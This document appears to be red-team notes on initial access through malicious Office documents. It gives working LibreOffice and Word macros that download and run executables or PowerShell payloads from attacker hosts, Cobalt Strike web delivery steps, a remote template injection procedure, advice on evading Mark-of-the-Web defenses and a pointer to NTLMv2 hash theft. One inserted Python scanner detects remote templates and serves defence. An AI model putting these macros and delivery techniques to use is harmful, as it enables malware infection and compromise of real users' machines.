Social Engineering
MOTW (Mark of the Web) is a metadata tag added by Windows to files downloaded from the internet. It’s stored as an Alternate Data Stream (Zone.Identifier) and tells the OS that the file came from an untrusted source (e.g., browser download, email attachment).
For Red Teamers, MOTW matters because it can trigger security features like SmartScreen, AMSI, or macro blocking in Office. Files marked with MOTW are more likely to be flagged, blocked, or require user interaction.
To increase payload execution success, it's crucial to deliver files without MOTW. Common ways to avoid it include:
- Using internal delivery methods (e.g., compromised Exchange, shared drives)
- Hosting files over SMB/WebDAV
- Packaging payloads in ZIPs without MOTW (e.g., ZIPs created locally or transferred via trusted channels)
- Using scripts or LOLBins that write the payload to disk without MOTW
Bottom line: No MOTW = fewer defenses triggered = higher success rate.
Macros
Macro for Libre Office
```vb
REM ***** BASIC *****
Sub InitialAccess
    ' Download the executable with PowerShell, then launch it
    Shell("cmd /c powershell IWR -URI http://10.8.5.48:8081/http-vulnlabs-4444.exe -Outfile C:\Windows\Temp\http-vulnlabs-4444.exe")
    Shell("cmd /c 'C:\Windows\Temp\http-vulnlabs-4444.exe'")
End Sub
```
Macro for MS Word
Loader Bypass AV/EDR: Bypass AV/EDR via DInvoke + Sliver
```vb
' Win32 API declarations: URLDownloadToFileA fetches the file, WinExec runs it
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long

Sub AutoOpen()
    URLDownloadToFileA 0, "http://10.8.5.48/Loader.exe", "C:\Windows\system32\spool\drivers\color\Loader.exe", 0, 0
    WinExec "C:\Windows\system32\spool\drivers\color\Loader.exe", SHOW_HIDE
End Sub
```
Word Malicious Macro with Cobalt Strike
Simple Macro
- Create a blank document
- View > Macros > Select document
- Generate a payload (Cobalt Strike example for CRTO) RevShells.com
  - Attacks > Scripted Web Delivery (S)
  - Set URI Path
  - Set Host (nickelviper.com)
  - Set Port (80)
  - Set Listener HTTP/DNS
  - Set type: Powershell
  - Enable Use X64 Payload
- Copy the payload and set it into the macro.
```vb
Sub AutoOpen()
    Dim Shell As Object
    Set Shell = CreateObject("wscript.shell")
    Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""
End Sub
```
- Save as .doc
- Send the file, for example via email from a compromised Exchange server to avoid the MOTW, or by any other method you want.
Remote Template injection
- Create a blank document
- View > Macros > Select document
- Generate a payload (Cobalt Strike example for CRTO) RevShells.com
  - Attacks > Scripted Web Delivery (S)
  - Set URI Path
  - Set Host (nickelviper.com)
  - Set Port (80)
  - Set Listener HTTP/DNS
  - Set type: Powershell
  - Enable Use X64 Payload
- Copy the payload and set it into the macro.
```vb
Sub AutoOpen()
    Dim Shell As Object
    Set Shell = CreateObject("wscript.shell")
    Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""
End Sub
```
- Save as .dot
- Host the file (Python web server or Cobalt Strike server)
- Create a new blank template and save it as .docx
- Open the .docx with 7-Zip
- Go to word > _rels > settings.xml.rels
- Modify the target parameter within the settings.xml.rels file so it points at the .dot file you created before and hosted.
- Send the file, for example via email from a compromised Exchange server to avoid the MOTW, or by any other method you want.
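From the defensive side, the settings.xml.rels edit described above is also what a mail gateway or sandbox can look for. The following scanner is an added example (not from these notes): it opens a .docx as a zip, reads word/_rels/settings.xml.rels and reports any attachedTemplate relationship whose target is external (http(s), UNC or file:), which a normal local template never is. The fixture builder and the template URL are constructed for the test.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
RELS_PATH = "word/_rels/settings.xml.rels"
REMOTE_PREFIXES = ("http://", "https://", "\\\\", "file:")


def find_remote_templates(docx_bytes):
    """Return the external attachedTemplate targets declared in settings.xml.rels.

    A clean document has no such relationship, or one that points at a local
    .dotx/.dotm. A remote-template document points at a URL or a UNC path, so
    Word will fetch the template (and its macros) when the file is opened.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if RELS_PATH not in z.namelist():
            return hits
        root = ET.fromstring(z.read(RELS_PATH))
        for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
            if rel.get("Type") != ATTACHED_TEMPLATE:
                continue
            target = rel.get("Target", "")
            if rel.get("TargetMode") == "External" and target.lower().startswith(REMOTE_PREFIXES):
                hits.append(target)
    return hits


def build_sample_docx(template_target=None):
    """Constructed minimal zip fixture for exercising the scanner; not a real Word file."""
    rels = f'<Relationships xmlns="{RELS_NS}">'
    if template_target:
        rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                 f'Target="{template_target}" TargetMode="External"/>')
    rels += "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr(RELS_PATH, rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: a document whose template lives on an external host
    print(find_remote_templates(build_sample_docx("http://templates.example/normal.dot")))
```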
Capturing NTLMv2 Hashes
If you have Write permission over a public SMB share in your target domain, or you find a website that accepts file uploads, you can use tools such as ntlm_theft to create malicious files and capture NTLMv2 hashes.
Some places to steal NTLMV2 Hashes